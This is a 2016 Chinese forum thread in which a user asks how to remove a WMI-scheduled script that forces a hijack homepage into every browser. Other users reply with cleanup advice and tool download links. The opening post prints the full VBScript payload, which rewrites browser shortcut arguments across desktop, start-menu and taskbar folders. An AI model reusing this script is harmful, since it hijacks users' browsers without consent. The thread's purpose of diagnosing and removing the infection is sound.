gzwcx 发表于 2016-11-11 19:36:07

定时自动运行脚本捆绑主页如何清除

本帖最后由 gzwcx 于 2016-11-12 13:27 编辑

      吃了苍蝇了!……http://hao524.com/?r=glaryutilitiesxx&m=xx3,打开多个浏览器:Chrome, Firefox, Opera,theworld, iexplorer,均相同症状,检查浏览器首页设置——均正常!
      用注册表编辑器修改,组策略清除也不能删除,定时2小时篡改一次.强制捆绑了主页,怎么都改不回来,杯具了……
通过WMI发起的定时自动运行脚本,用WMITool 工具也不能清除。
ScriptText 具体代码如下:
On Error Resume Next:Const link = "http://hao524.com/?r=glaryutilitiesxx&m=xx3":Const link360 = "http://hao524.com/?r=glaryutilitiesxx&m=xx3&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
用什么方法可以清除ScriptText?否则只有重装系统了.

tools241 发表于 2016-11-11 20:44:46

简/繁 PE 通用工具包PE_Tools (Unlocker,64bit-Checker,7-Zip,PDFX,WordReader,WimTool,Recuva[救回误删档],
BOOTICE,手写+XP14种输入法+yong小小输入法10种,VeraCrypt加密,Defraggler磁碟重组,WinContig碎片文件整理)
可再添加Firefox,Chrome,影片剪辑 ==>
http://bbs.wuyou.net/forum.php?mod=viewthread&tid=375264
http://nonameteam.cc/thread-2887-1-1.html

易广白 发表于 2016-11-11 20:58:42

这网址发岀来,让人一顺手就点击了,不太好

ggmm888 发表于 2016-11-11 21:18:41

这个是在桌面上的快捷方式里面添加的链接,把这个网址去掉即可。

2011momoto 发表于 2016-11-11 21:21:18

试试看,行不行。

gzwcx 发表于 2016-11-11 21:39:57

2011momoto 发表于 2016-11-11 21:21
试试看,行不行。

不是这个工具,微软WmiTools:WMI Administrative Tools

nttwqz 发表于 2016-11-11 23:29:38

楼主,我帮你搜索了一下,第一页就有

http://pan.baidu.com/s/1pC4tr

nttwqz 发表于 2016-11-11 23:34:49

每次重启都会生成

这说明有开机启动项未清除干净

zengqcyxx 发表于 2016-11-12 00:58:44

nttwqz 发表于 2016-11-11 23:34
这说明有开机启动项未清除干净

这与开机启动项无关,是人家对内核作了手脚,自动定时创建修改浏览器网址脚本,只能通过WMItools将该脚本删除。

tools241 发表于 2016-11-12 07:47:30

本帖最后由 tools241 于 2016-11-12 07:53 编辑

** Firefox 50 免安装 异空版 + Flash Player +26元件 (简/繁/英 , PE/Windows 一版通用) ==>
   http://bbs.wuyou.net/forum.php?mod=viewthread&tid=375104
   https://www.firefox.net.CN/read-52082
   http://blog.xuite.net/tools241/blog/108046689
   https://forum.mozTW.org/viewforum.php?f=43
   http://nonameteam.cc/thread-1308-1-1.html

此 Firefox 免安装版 对多数绑首页/分页的网址( ha?5??, ha?1??, ha?, babylon , qvo6, nationzoom, ask, ... )已免疫.

如何在PE添加Firefox/Chrome请参考此版附档:r说明在PE添加Firefox,GoogleChrome.txt
页: [1] 2
查看完整版本: 定时自动运行脚本捆绑主页如何清除